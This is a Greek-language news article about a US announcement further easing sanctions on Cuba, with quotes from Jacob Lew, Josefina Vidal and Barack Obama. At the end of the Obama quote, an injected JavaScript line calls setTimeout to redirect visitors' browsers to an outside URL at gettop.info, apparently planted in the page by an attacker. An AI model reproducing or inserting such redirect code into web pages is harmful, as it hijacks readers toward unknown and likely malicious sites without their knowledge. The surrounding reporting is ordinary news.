Νέα χαλάρωση των κυρώσεων στην Κούβα ανακοίνωσαν οι ΗΠΑ

0
13
epa05226389 US President Barack Obama (L) and President of Cuba Raul Castro (R) attend a Major League Baseball exhibition game between the Tampa Bay Rays and the Cuban national team at the Estadio Latinoamericano (Latin American Stadium) in Havana, Cuba, 22 March 2016. Obama is on an official visit to Cuba from 20 to 22 March 2016, the first sitting US president to visit since Calvin Coolidge 88 years ago. EPA/MICHAEL REYNOLDS

 

Οι Ηνωμένες Πολιτείες ανακοίνωσαν την Παρασκευή νέα χαλάρωση των κυρώσεων που επιβάλλουν στην Κούβα με σκοπό κυρίως να διευκολύνουν τις εμπορικές ανταλλαγές στην ιατρική έρευνα και την αγορά κουβανικών πούρων και ρουμιού στο εξωτερικό.

Αυτό το νέο στάδιο στην επαναπροσέγγιση των δύο χωρών που υπήρξαν εχθροί στη διάρκεια του Ψυχρού Πολέμου «μπορεί να ανοίξει νέες ευκαιρίες για τους Κουβανούς και τους Αμερικανούς«, δήλωσε ο αμερικανός υπουργός Οικονομικών Τζέικομπ Λιού. Το οικονομικό και χρηματοπιστωτικό εμπάργκο το οποίο επιβλήθηκε το 1962  -και δεν μπορεί να αρθεί παρά μόνο από το Κογκρέσο στην Ουάσινγκτον -παραμένει ωστόσο σε ισχύ.

«Είναι ένα θετικό βήμα, είναι ένα σημαντικό βήμα στη διαδικασία προς την άρση των εμποδίων και τη βελτίωση των σχέσεών μας«, δήλωσε στην Αβάνα η Χοσεφίνα Βιδάλ, αξιωματούχος της κουβανικής καγκελαρίας αρμόδια για τις υποθέσεις με την Ουάσινγκτον.

Ωστόσο, «βλέπουμε ότι αυτό το έγγραφο δεν κρύβει τον σκοπό να προωθήσει αλλαγές» στην Κούβα και «δεν αποκρύπτει τη βούληση να συνεχίσει να διεκπεραιώνει προγράμματα παρέμβασης στη χώρα μας«, πρόσθεσε η Βιδάλ.

«Προκλήσεις παραμένουν -και πραγματικές διαφορές ανάμεσα στις κυβερνήσεις μας επιμένουν για τα θέματα της δημοκρατίας και των ανθρωπίνων δικαιωμάτων -όμως νομίζω πως η δέσμευσή μας είναι ο καλύτερος τρόπος να αντιμετωπίσουμε αυτές τις διαφορές και να σημειώσουμε πρόοδο«, ανέφερε σε ανακοίνωση ο Μπαράκ Ομπάμα. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here